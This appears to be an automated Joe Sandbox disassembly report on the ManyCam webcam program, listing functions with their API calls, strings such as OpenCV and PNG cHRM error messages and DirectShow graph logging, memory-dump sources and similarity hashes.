cvGetErrStatus.CXCORE099 ref: 00B92B00
cvError.CXCORE099(000000FF,cvLoadImage,Inner function failed.,.\loadsave.cpp,00000189), ref: 00B92B1F
cvGetMat.CXCORE099(?,?,00000000,00000000), ref: 00B92B37
cvReleaseMat.CXCORE099(?), ref: 00B92B6A
cvGetErrStatus.CXCORE099(?,?,?,?,?,?,?,00B92BFF,00000000,00B92123,?,?), ref: 00B92B7D
cvReleaseMat.CXCORE099 ref: 00B92B93
cvReleaseImage.CXCORE099(?), ref: 00B92BB2
cvError.CXCORE099(000000E5,cvLoadImage,null filename,.\loadsave.cpp,00000174,?,?,?,?,?,?,?,00B92BFF,00000000,00B92123,?), ref: 00B92BCF
cvReleaseImage.CXCORE099(?), ref: 00B92BDE

Strings

cvLoadImage, xrefs: 00B92B18, 00B92BC8
null filename, xrefs: 00B92BC3
Inner function failed., xrefs: 00B92B13
.\loadsave.cpp, xrefs: 00B92B0E, 00B92BBE

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Release$ImageStatus$CreateError
String ID: .\loadsave.cpp$Inner function failed.$cvLoadImage$null filename
API String ID: 3787916741-4128775367
Opcode ID: 634642ce48e0209415a6f409255ebfd79e817705e24d1733f8db888929997c05
Instruction ID: 4fd236d01a7ddc29cb1e2944016642a8a080f688506ec4265cf43fdbf0a7b267
Opcode Fuzzy Hash: 634642ce48e0209415a6f409255ebfd79e817705e24d1733f8db888929997c05
Instruction Fuzzy Hash: 6D41C2B19043007BDF20EF25CC42F6AB7D59F94710F1889F9F49947292E735E9098792

Function 00BC0110 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 223COMMON

Download Yara Rule

APIs

_ftol.MSVCR80 ref: 00BC0190
_ftol.MSVCR80 ref: 00BC01B0
_ftol.MSVCR80 ref: 00BC0240
_ftol.MSVCR80 ref: 00BC0260
_ftol.MSVCR80 ref: 00BC02F0
_ftol.MSVCR80 ref: 00BC0310
_ftol.MSVCR80 ref: 00BC0398
_ftol.MSVCR80 ref: 00BC03B8
fprintf.MSVCR80 ref: 00BC0458

Strings

white_x=%f, white_y=%f, xrefs: 00BC0452
Invalid cHRM red point specified, xrefs: 00BC0415
Invalid cHRM white point specified, xrefs: 00BC042B
cHRM, xrefs: 00BC03D3
Invalid cHRM green point specified, xrefs: 00BC03FF
Invalid cHRM blue point specified, xrefs: 00BC03E9

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _ftol$fprintf
String ID: Invalid cHRM blue point specified$Invalid cHRM green point specified$Invalid cHRM red point specified$Invalid cHRM white point specified$cHRM$white_x=%f, white_y=%f
API String ID: 3291409459-3520686153
Opcode ID: 9e220e80cd3a152a743ebf6b958aa87b44018f042b26d66631b970bf85d37787
Instruction ID: ef0e694ddc1fc45a01d09d85eaf00abe3a3232ef785e71385f36c5b170620622
Opcode Fuzzy Hash: 9e220e80cd3a152a743ebf6b958aa87b44018f042b26d66631b970bf85d37787
Instruction Fuzzy Hash: 88717CB140465AE3EB04BB40EE2DAABBBF8FFC9780F040A99F1D511165EFB5D4958702

Function 00B95160 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 164COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000E5,cvShowImage,NULL name,.\window_w32.cpp,0000026B), ref: 00B951BF
cvGetMat.CXCORE099(?,?,00000000,00000000), ref: 00B95211
cvGetErrStatus.CXCORE099 ref: 00B9521F
cvError.CXCORE099(000000FF,cvShowImage,Inner function failed.,.\window_w32.cpp,00000274), ref: 00B9523E

Strings

.\window_w32.cpp, xrefs: 00B951AE, 00B9522D
NULL name, xrefs: 00B951B3
Inner function failed., xrefs: 00B95232
cvShowImage, xrefs: 00B951B8, 00B95237

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\window_w32.cpp$Inner function failed.$NULL name$cvShowImage
API String ID: 483703942-1490608787
Opcode ID: ba539ed09172e7520002fe2abba57de94d8b08ac515c272f822029af0a9c36ac
Instruction ID: 4ce69bc61eb7b2099568027050c7495b4d021fee2d497e247b0fa058542f73d8
Opcode Fuzzy Hash: ba539ed09172e7520002fe2abba57de94d8b08ac515c272f822029af0a9c36ac
Instruction Fuzzy Hash: B851B3B2648300AFDB20DF64DC81F5BB7E8EBD8704F04496DF58997291E770E9058BA6

Function 00506610 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 118fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0050665D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0050669D
CloseHandle.KERNEL32(000000FF), ref: 005066AE

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Strings

The Resource File is corrupted. Please select another., xrefs: 00506718
The Resource File is corrupted. Please select another., xrefs: 0050666C
You have selected a file with the size larger than 3Mb., xrefs: 005066B4
You have selected an image with the dimension larger than 3000x2000., xrefs: 0050676F

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: File$AllocatorCloseCreateDebugHandleHeapSize
String ID: The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$You have selected a file with the size larger than 3Mb.$You have selected an image with the dimension larger than 3000x2000.
API String ID: 1278540365-1045440647
Opcode ID: a2995053e53532cd3cc61e84a4e3e243a16d3489957e33b38d496d8e3a878c98
Instruction ID: bf2e516d7632956263a6d0b7edc6ab055445a249ca0629827ad9313cad8a857e
Opcode Fuzzy Hash: a2995053e53532cd3cc61e84a4e3e243a16d3489957e33b38d496d8e3a878c98
Instruction Fuzzy Hash: 3D513C70900259ABDB25EF14DC55BEDBBB0FF45704F1085AAF819AB2D0CB75AE84CB80

Function 00BBC750 Relevance: 24.9, APIs: 2, Strings: 12, Instructions: 406COMMON

Download Yara Rule

APIs

fprintf.MSVCR80 ref: 00BBCADC

Strings

Invalid cHRM green point, xrefs: 00BBCBE2
Incorrect cHRM chunk length, xrefs: 00BBC7E2
Invalid cHRM blue point, xrefs: 00BBCBC5
Ignoring incorrect cHRM value when sRGB is also present, xrefs: 00BBCA97
Invalid cHRM red point, xrefs: 00BBCBFF
Missing PLTE before cHRM, xrefs: 00BBC79A
Duplicate cHRM chunk, xrefs: 00BBC7BB
Invalid cHRM after IDAT, xrefs: 00BBC777
Invalid cHRM white point, xrefs: 00BBCC1C
wx=%f, wy=%f, rx=%f, ry=%f, xrefs: 00BBCAD6
gx=%f, gy=%f, bx=%f, by=%f, xrefs: 00BBCB0F
Missing IHDR before cHRM, xrefs: 00BBC766

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: fprintf
String ID: Duplicate cHRM chunk$Ignoring incorrect cHRM value when sRGB is also present$Incorrect cHRM chunk length$Invalid cHRM after IDAT$Invalid cHRM blue point$Invalid cHRM green point$Invalid cHRM red point$Invalid cHRM white point$Missing IHDR before cHRM$Missing PLTE before cHRM$gx=%f, gy=%f, bx=%f, by=%f$wx=%f, wy=%f, rx=%f, ry=%f
API String ID: 383729395-3711243189
Opcode ID: 9eb3e017c56c4ca1ebb05818c9febe57aaeb7cf967258a0f0624f3dd6be044df
Instruction ID: 6c0877a0d9dad76b35869a9d9994040e9bb660a2dd9a2cb0790d9ed4eea2d9b9
Opcode Fuzzy Hash: 9eb3e017c56c4ca1ebb05818c9febe57aaeb7cf967258a0f0624f3dd6be044df
Instruction Fuzzy Hash: A7C1E3726042089FD310FB19D88ADFEBFE8EF84314F80499DF58492192DBF5956887A7

Function 0040C220 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 308memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FA80: List.LIBCMTD ref: 0040FA8A

_DebugHeapAllocator.LIBCPMTD ref: 0040C2DC

Part of subcall function 004DBD20: Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 004DBD89

Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 0040C305

Part of subcall function 004DB530: _DebugHeapAllocator.LIBCPMTD ref: 004DB54A

_DebugHeapAllocator.LIBCPMTD ref: 0040C35E
_DebugHeapAllocator.LIBCPMTD ref: 0040C371

Part of subcall function 004DAFB0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004DB014

_snwprintf.MSVCR80 ref: 0040C591
wcslen.MSVCR80 ref: 0040C59E
wcscpy.MSVCR80 ref: 0040C5CE
wcslen.MSVCR80 ref: 0040C5DB

Part of subcall function 0040F760: _invalid_parameter_noinfo.MSVCR80(00000000,?,00409D5D,?,?,00000000,?,?,?,mce,?,?,?,?,?,?), ref: 0040F774

wcscat.MSVCR80 ref: 0040C633

Strings

*.%s, xrefs: 0040C426
*.%s, xrefs: 0040C506
;*.%s, xrefs: 0040C568
%s files (%s), xrefs: 0040C583
;*.%s, xrefs: 0040C488

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Base::Concurrency::details::$PolicySchedulerwcslen$ContextIdentityListQueueWork_invalid_parameter_noinfo_snwprintfwcscatwcscpy
String ID: %s files (%s)$*.%s$*.%s$;*.%s$;*.%s
API String ID: 3673500439-2222090975
Opcode ID: 410b57a6a7f9a888242e909b12c55668fef034fc55ece74735e624549ad644eb
Instruction ID: 0f1205feb10db953e557daecc0f66cfc6334ceda2ae244769a0a321528e6ad92
Opcode Fuzzy Hash: 410b57a6a7f9a888242e909b12c55668fef034fc55ece74735e624549ad644eb
Instruction Fuzzy Hash: 7BC12F71D00208DBDB14EBA5E892BEEB775AF54308F10417EF116B72D1DB385A48CB99

Function 0041A3B0 Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 308memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787

_DebugHeapAllocator.LIBCPMTD ref: 0041A415

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

_DebugHeapAllocator.LIBCPMTD ref: 0041A437
_DebugHeapAllocator.LIBCPMTD ref: 0041A455
_DebugHeapAllocator.LIBCPMTD ref: 0041A47D

Part of subcall function 00472C60: _wfopen_s.MSVCR80 ref: 00472CBE
Part of subcall function 00472C60: fclose.MSVCR80 ref: 00472CDF

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 004730D0: _DebugHeapAllocator.LIBCPMTD ref: 0047314B
Part of subcall function 004730D0: _DebugHeapAllocator.LIBCPMTD ref: 0047316D

?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,?,00000000,?,0053E990,?,?,?,?,?,\class.xml,?,?,?,data\images\), ref: 0041A530

Strings

style, xrefs: 0041A64A
S, xrefs: 0041A6C4
data\images\, xrefs: 0041A40D
\class.xml, xrefs: 0041A42F
icon_and_text, xrefs: 0041A696
P, xrefs: 0041A4A6
8S, xrefs: 0041A6B6
icon, xrefs: 0041A674

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Image@@Load@_wfopen_sfclose
String ID: 8S$P$\class.xml$data\images\$icon$icon_and_text$style$S
API String ID: 255584289-693003568
Opcode ID: 603b225bfe0989b9d3390ef585aae42c8b49bc1da2bbc25a9b3d303a95ec7668
Instruction ID: 810976337b1479ad00da3f975604671f65968c870661c51cbc195e462080606e
Opcode Fuzzy Hash: 603b225bfe0989b9d3390ef585aae42c8b49bc1da2bbc25a9b3d303a95ec7668
Instruction Fuzzy Hash: 4BD16EB0D012189BDB14DB95CD92BEDBBB4BF18304F10819EE14A77281DB746E85CF9A

Function 00B96350 Relevance: 24.3, APIs: 16, Instructions: 305COMMON

Download Yara Rule

APIs

Part of subcall function 00B94A80: GetWindowLongA.USER32(?,000000EB), ref: 00B94A83

DefWindowProcA.USER32(?,?,?), ref: 00B96394
SetCapture.USER32 ref: 00B965F8
ReleaseCapture.USER32 ref: 00B96616
GetClientRect.USER32(?,?), ref: 00B9662E
DefWindowProcA.USER32(?,?,?), ref: 00B966B4

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Window$CaptureProc$ClientLongRectRelease
String ID:
API String ID: 81580808-0
Opcode ID: f7c7ac7ecadc59b9c37d91d66d2000a400560e5ce704e074679cc101f44bff6f
Instruction ID: 307f802d2db86b9a777ac61f12f976e7a504b723aae1109b80eca2661e159216
Opcode Fuzzy Hash: f7c7ac7ecadc59b9c37d91d66d2000a400560e5ce704e074679cc101f44bff6f
Instruction Fuzzy Hash: 7AB1D2715083029FDB24CF64C898BAFBBE5EBC8304F11496EF98597251D774E845CB92

Function 00BDBEA0 Relevance: 24.1, APIs: 16, Instructions: 141sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?,00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDBEFD
InterlockedCompareExchange.KERNEL32(00BED220,?,00000000), ref: 00BDBF06
_amsg_exit.MSVCR80 ref: 00BDBF24
_initterm_e.MSVCR80 ref: 00BDBF3F
_initterm.MSVCR80 ref: 00BDBF5B
InterlockedExchange.KERNEL32(00BED220,00000000), ref: 00BDBF70
Sleep.KERNEL32(000003E8,?,?,00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDBFC1
InterlockedCompareExchange.KERNEL32(00BED220,00000001,00000000), ref: 00BDBFCB
_amsg_exit.MSVCR80 ref: 00BDBFDD
_decode_pointer.MSVCR80(?,?,00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDBFF1
_decode_pointer.MSVCR80(?,00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDC000
_encoded_null.MSVCR80(00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDC012
_decode_pointer.MSVCR80(?,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDC022
free.MSVCR80 ref: 00BDC02F
_encoded_null.MSVCR80(?,00BE3960,00000010,00BDC196,?), ref: 00BDC036
InterlockedExchange.KERNEL32(00BED220,00000000), ref: 00BDC053

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ExchangeInterlocked$_decode_pointer$CompareSleep_amsg_exit_encoded_null$_initterm_initterm_efree
String ID:
API String ID: 2174737765-0
Opcode ID: 771b923fa2d5699d359c5fe235b1fa28830183841917b08d1fb3a6a8507b2e84
Instruction ID: 789492e6c99a749125446639d112f27dfd02712bcb19e53928187c46863079de
Opcode Fuzzy Hash: 771b923fa2d5699d359c5fe235b1fa28830183841917b08d1fb3a6a8507b2e84
Instruction Fuzzy Hash: 19419931509246DFC620AF65EC94A2AFFE4EB48314F2104ABF6459B2A1FFB1D841DF91

Function 004B8420 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 284memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

_DebugHeapAllocator.LIBCPMTD ref: 004B84DB
??2@YAPAXI@Z.MSVCR80(00000030,?,?,?,?,?,?,?,7EC02BB4), ref: 004B84E2

Part of subcall function 004B77A0: fwprintf.MSVCR80 ref: 004B7842
Part of subcall function 004B77A0: fflush.MSVCR80 ref: 004B7852

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

Couldn't find the graph %s!, xrefs: 004B86E7
Creating frame grabbing graph for file %s, xrefs: 004B856B
Failed creating graph with hr=%X; preparing to clean up., xrefs: 004B8697
Creating frame grabbing graph for camera %s, xrefs: 004B84C0
Setting current pos for the graph %s, xrefs: 004B8616
Setting graph state %d, xrefs: 004B8655
AppModel pointer is NULL! Returning E_FAIL., xrefs: 004B8472
Destroying the graph., xrefs: 004B8725
CManyCamGraphMgr::CreateGraph, xrefs: 004B8448

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapclock$??2@fflushfwprintf
String ID: AppModel pointer is NULL! Returning E_FAIL.$CManyCamGraphMgr::CreateGraph$Couldn't find the graph %s!$Creating frame grabbing graph for camera %s$Creating frame grabbing graph for file %s$Destroying the graph.$Failed creating graph with hr=%X; preparing to clean up.$Setting current pos for the graph %s$Setting graph state %d
API String ID: 1778695617-1153812090
Opcode ID: f1e7f66eff02cda7a9ed3db3bcb49d45f39b49662cdf193da7ba6901c3f1654f
Instruction ID: f3cb85e83180b36cfd0b303413b5ba2857901d6173e86f69feec068597868732
Opcode Fuzzy Hash: f1e7f66eff02cda7a9ed3db3bcb49d45f39b49662cdf193da7ba6901c3f1654f
Instruction Fuzzy Hash: FBC11B75D00209AFDB04DF99CC92BEEB7B4AF48308F14411EF5167B292DB786A05CB69

Function 005062D0 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00506312
_DebugHeapAllocator.LIBCPMTD ref: 00506336
_DebugHeapAllocator.LIBCPMTD ref: 00506352
_DebugHeapAllocator.LIBCPMTD ref: 0050636E

Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6

??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,00000002,7EC02BB4), ref: 005063A1
??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,00000002,7EC02BB4), ref: 005063B5

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4E3
Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4FF

memcpy.MSVCR80(?,?,?,7EC02BB4), ref: 0050646C
??3@YAXPAX@Z.MSVCR80(?,?,anonymous_type,?,?,mask_reader_ver,?,?,mask_type,?,?,?,?,7EC02BB4), ref: 0050652C
??3@YAXPAX@Z.MSVCR80(?,?,?,?,?,7EC02BB4), ref: 0050653E

Strings

mask_reader_ver, xrefs: 005064BA
properties, xrefs: 005063F3
mask_type, xrefs: 00506483
anonymous_type, xrefs: 005064F1

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$??3@Image@@$memcpy
String ID: anonymous_type$mask_reader_ver$mask_type$properties
API String ID: 3418783136-1683271502
Opcode ID: ea6c7d0e71fb220edab34224d6aa0e07e57cb9ccd2759369dc2a5b15c5864e21
Instruction ID: 830ff7d4bb77275050dcf287e18c53aa9cee5c96830a24d37f20f8f55580aab9
Opcode Fuzzy Hash: ea6c7d0e71fb220edab34224d6aa0e07e57cb9ccd2759369dc2a5b15c5864e21
